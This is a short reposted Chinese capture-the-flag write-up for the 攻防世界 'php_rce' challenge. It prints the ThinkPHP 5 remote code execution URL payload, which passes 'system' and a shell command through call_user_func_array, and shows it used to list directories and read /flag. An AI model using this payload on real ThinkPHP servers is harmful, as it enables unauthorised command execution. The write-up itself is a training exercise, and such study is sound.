碼上歡樂
相關內容    簡體    繁體

攻防世界(四)php_rce

本文轉載自   查看原文   2020-08-30 10:54   1114    CTF

攻防世界系列:php_rce

 

1.打開題目

看到這個還是很懵的,點開任意連接都是真實的場景。

 

 2.ThinkPHP5,這里我們需要知道它存在

遠程代碼執行的漏洞。

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=xxxxx(命令)

ls查看

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls

 

 

上一級 ls ../

 

根目錄下 ls /

 

 發現 flag打開flag   cat /flag

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 攻防世界-web-php_rce(ThinkPHP 5.0命令執行漏洞) 攻防世界-web-高手進階區003-php_rce CTF-攻防世界-web-php_rce(ThinkPHP5.x < 5.1.31, <= 5.0.23) CTF-攻防世界-web-php_rce(ThinkPHP遠程代碼執行) 攻防世界web之PHP2 Web_php_unserialize-攻防世界XCTF Web_php_include-攻防世界 攻防世界(三)Web_php_unserialize 攻防世界Web_php_unserialize 攻防世界(五)Web_php_include
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM